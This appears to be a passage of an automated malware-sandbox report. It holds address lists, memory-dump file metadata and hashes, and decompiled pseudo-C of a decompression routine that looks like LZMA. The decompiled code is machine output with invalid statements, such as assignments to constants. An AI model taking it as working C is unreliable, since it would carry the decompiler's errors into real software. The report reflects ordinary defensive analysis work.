                                                                                                    0x00406558
                                                                                                    0x00406559
                                                                                                    0x0040655b
                                                                                                    0x0040655e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406566
                                                                                                    0x00406569
                                                                                                    0x0040656c
                                                                                                    0x0040656e
                                                                                                    0x00406570
                                                                                                    0x00406570
                                                                                                    0x00406571
                                                                                                    0x00406574
                                                                                                    0x0040657b
                                                                                                    0x0040657e
                                                                                                    0x0040658c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406862
                                                                                                    0x00406862
                                                                                                    0x00406865
                                                                                                    0x0040686c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406871
                                                                                                    0x00406871
                                                                                                    0x00406875
                                                                                                    0x004069ad
                                                                                                    0x00000000
                                                                                                    0x004069ad
                                                                                                    0x0040687b
                                                                                                    0x0040687e
                                                                                                    0x00406881
                                                                                                    0x00406885
                                                                                                    0x00406888
                                                                                                    0x0040688e
                                                                                                    0x00406890
                                                                                                    0x00406890
                                                                                                    0x00406890
                                                                                                    0x00406893
                                                                                                    0x00406896
                                                                                                    0x00406896
                                                                                                    0x00406896
                                                                                                    0x00406896
                                                                                                    0x00406899
                                                                                                    0x00406899
                                                                                                    0x0040689d
                                                                                                    0x004068fd
                                                                                                    0x00406900
                                                                                                    0x00406905
                                                                                                    0x00406906
                                                                                                    0x00406908
                                                                                                    0x0040690a
                                                                                                    0x0040690d
                                                                                                    0x00406819
                                                                                                    0x00406819
                                                                                                    0x00000000
                                                                                                    0x0040681f
                                                                                                    0x00406819
                                                                                                    0x0040689f
                                                                                                    0x004068a5
                                                                                                    0x004068a8
                                                                                                    0x004068ab
                                                                                                    0x004068ae
                                                                                                    0x004068b1
                                                                                                    0x004068b4
                                                                                                    0x004068b7
                                                                                                    0x004068ba
                                                                                                    0x004068bd
                                                                                                    0x004068c0
                                                                                                    0x004068d9
                                                                                                    0x004068dc
                                                                                                    0x004068df
                                                                                                    0x004068e2
                                                                                                    0x004068e6
                                                                                                    0x004068e8
                                                                                                    0x004068e8
                                                                                                    0x004068e9
                                                                                                    0x004068ec
                                                                                                    0x004068c2
                                                                                                    0x004068c2
                                                                                                    0x004068ca
                                                                                                    0x004068cf
                                                                                                    0x004068d1
                                                                                                    0x004068d4
                                                                                                    0x004068d4
                                                                                                    0x004068ef
                                                                                                    0x004068f6
                                                                                                    0x00000000
                                                                                                    0x004068f8
                                                                                                    0x00000000
                                                                                                    0x004068f8
                                                                                                    0x00000000
                                                                                                    0x00406594
                                                                                                    0x00406597
                                                                                                    0x004065cd
                                                                                                    0x004066fd
                                                                                                    0x004066fd
                                                                                                    0x004066fd
                                                                                                    0x004066fd
                                                                                                    0x00406700
                                                                                                    0x00406700
                                                                                                    0x00406703
                                                                                                    0x00406705
                                                                                                    0x0040698f
                                                                                                    0x00000000
                                                                                                    0x0040698f
                                                                                                    0x0040670b
                                                                                                    0x0040670e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406714
                                                                                                    0x00406718
                                                                                                    0x0040671b
                                                                                                    0x0040671b
                                                                                                    0x0040671b
                                                                                                    0x00000000
                                                                                                    0x0040671b
                                                                                                    0x00406599
                                                                                                    0x0040659b
                                                                                                    0x0040659d
                                                                                                    0x0040659f
                                                                                                    0x004065a2
                                                                                                    0x004065a3
                                                                                                    0x004065a5
                                                                                                    0x004065a7
                                                                                                    0x004065aa
                                                                                                    0x004065ad
                                                                                                    0x004065c3
                                                                                                    0x004065c8
                                                                                                    0x00406600
                                                                                                    0x00406600
                                                                                                    0x00406604
                                                                                                    0x00406630
                                                                                                    0x00406632
                                                                                                    0x00406639
                                                                                                    0x0040663c
                                                                                                    0x0040663f
                                                                                                    0x0040663f
                                                                                                    0x00406644
                                                                                                    0x00406644
                                                                                                    0x00406646
                                                                                                    0x00406649
                                                                                                    0x00406650
                                                                                                    0x00406653
                                                                                                    0x00406680
                                                                                                    0x00406680
                                                                                                    0x00406683
                                                                                                    0x00406686
                                                                                                    0x004066fa
                                                                                                    0x004066fa
                                                                                                    0x004066fa
                                                                                                    0x00000000
                                                                                                    0x004066fa
                                                                                                    0x00406688
                                                                                                    0x0040668e
                                                                                                    0x00406691
                                                                                                    0x00406694
                                                                                                    0x00406697
                                                                                                    0x0040669a
                                                                                                    0x0040669d
                                                                                                    0x004066a0
                                                                                                    0x004066a3
                                                                                                    0x004066a6
                                                                                                    0x004066a9
                                                                                                    0x004066c2
                                                                                                    0x004066c4
                                                                                                    0x004066c7
                                                                                                    0x004066c8
                                                                                                    0x004066cb
                                                                                                    0x004066cd
                                                                                                    0x004066d0
                                                                                                    0x004066d2
                                                                                                    0x004066d4
                                                                                                    0x004066d7
                                                                                                    0x004066d9
                                                                                                    0x004066dc
                                                                                                    0x004066e0
                                                                                                    0x004066e2
                                                                                                    0x004066e2
                                                                                                    0x004066e3
                                                                                                    0x004066e6
                                                                                                    0x004066e9
                                                                                                    0x004066ab
                                                                                                    0x004066ab
                                                                                                    0x004066b3
                                                                                                    0x004066b8
                                                                                                    0x004066ba
                                                                                                    0x004066bd
                                                                                                    0x004066bd
                                                                                                    0x004066ec
                                                                                                    0x004066f3
                                                                                                    0x0040667d
                                                                                                    0x0040667d
                                                                                                    0x0040667d
                                                                                                    0x0040667d
                                                                                                    0x00000000
                                                                                                    0x004066f5
                                                                                                    0x00000000
                                                                                                    0x004066f5
                                                                                                    0x004066f3
                                                                                                    0x00406606
                                                                                                    0x00406609
                                                                                                    0x0040660b
                                                                                                    0x0040660e
                                                                                                    0x00406611
                                                                                                    0x00406614
                                                                                                    0x00406616
                                                                                                    0x00406619
                                                                                                    0x0040661c
                                                                                                    0x0040661c
                                                                                                    0x0040661f
                                                                                                    0x0040661f
                                                                                                    0x00406622
                                                                                                    0x00406629
                                                                                                    0x004065fd
                                                                                                    0x004065fd
                                                                                                    0x004065fd
                                                                                                    0x004065fd
                                                                                                    0x00000000
                                                                                                    0x0040662b
                                                                                                    0x00000000
                                                                                                    0x0040662b
                                                                                                    0x00406629
                                                                                                    0x004065af
                                                                                                    0x004065b2
                                                                                                    0x004065b4
                                                                                                    0x004065b7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406316
                                                                                                    0x00406316
                                                                                                    0x0040631a
                                                                                                    0x0040695f
                                                                                                    0x00000000
                                                                                                    0x0040695f
                                                                                                    0x00406320
                                                                                                    0x00406323
                                                                                                    0x00406326
                                                                                                    0x00406329
                                                                                                    0x0040632c
                                                                                                    0x0040632f
                                                                                                    0x00406332
                                                                                                    0x00406334
                                                                                                    0x00406337
                                                                                                    0x0040633a
                                                                                                    0x0040633d
                                                                                                    0x0040633f
                                                                                                    0x0040633f
                                                                                                    0x0040633f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004064a1
                                                                                                    0x004064a1
                                                                                                    0x004064a5
                                                                                                    0x0040696b
                                                                                                    0x00000000
                                                                                                    0x0040696b
                                                                                                    0x004064ab
                                                                                                    0x004064ae
                                                                                                    0x004064b1
                                                                                                    0x004064b4
                                                                                                    0x004064b6
                                                                                                    0x004064b6
                                                                                                    0x004064b6
                                                                                                    0x004064b9
                                                                                                    0x004064bc
                                                                                                    0x004064bf
                                                                                                    0x004064c2
                                                                                                    0x004064c5
                                                                                                    0x004064c8
                                                                                                    0x004064c9
                                                                                                    0x004064cb
                                                                                                    0x004064cb
                                                                                                    0x004064cb
                                                                                                    0x004064ce
                                                                                                    0x004064d1
                                                                                                    0x004064d4
                                                                                                    0x004064d7
                                                                                                    0x004064d7
                                                                                                    0x004064d7
                                                                                                    0x004064da
                                                                                                    0x004064dc
                                                                                                    0x004064dc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040671e
                                                                                                    0x0040671e
                                                                                                    0x0040671e
                                                                                                    0x00406722
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406728
                                                                                                    0x0040672b
                                                                                                    0x0040672e
                                                                                                    0x00406731
                                                                                                    0x00406733
                                                                                                    0x00406733
                                                                                                    0x00406733
                                                                                                    0x00406736
                                                                                                    0x00406739
                                                                                                    0x0040673c
                                                                                                    0x0040673f
                                                                                                    0x00406742
                                                                                                    0x00406745
                                                                                                    0x00406746
                                                                                                    0x00406748
                                                                                                    0x00406748
                                                                                                    0x00406748
                                                                                                    0x0040674b
                                                                                                    0x0040674e
                                                                                                    0x00406751
                                                                                                    0x00406754
                                                                                                    0x00406757
                                                                                                    0x0040675b
                                                                                                    0x0040675d
                                                                                                    0x00406760
                                                                                                    0x00000000
                                                                                                    0x00406762
                                                                                                    0x004064df
                                                                                                    0x004064df
                                                                                                    0x00000000
                                                                                                    0x004064df
                                                                                                    0x00406760
                                                                                                    0x00406995
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405fc4
                                                                                                    0x004069cc
                                                                                                    0x004069cc
                                                                                                    0x00000000
                                                                                                    0x004069cc
                                                                                                    0x00406819
                                                                                                    0x004067a0
                                                                                                    0x0040679d
                                                                                                    0x00000000
                                                                                                    0x004063d4

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 040a7e0d789931a885e98904e34fb369bef72c7c312577bd0d6f252efd828c84
                                                                                                    • Instruction ID: 235c9a1f152390887c8e3346b3cf8cf745e7d176c25095dba4735a56a8f4339d
                                                                                                    • Opcode Fuzzy Hash: 040a7e0d789931a885e98904e34fb369bef72c7c312577bd0d6f252efd828c84
                                                                                                    • Instruction Fuzzy Hash: 80714371D00229CBDF28CFA8C8447ADBBF1FB48305F15806AD846BB281D7395A96DF54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004064EE, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 98%
                                                                                                    			E004064EE() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600);
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40));
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
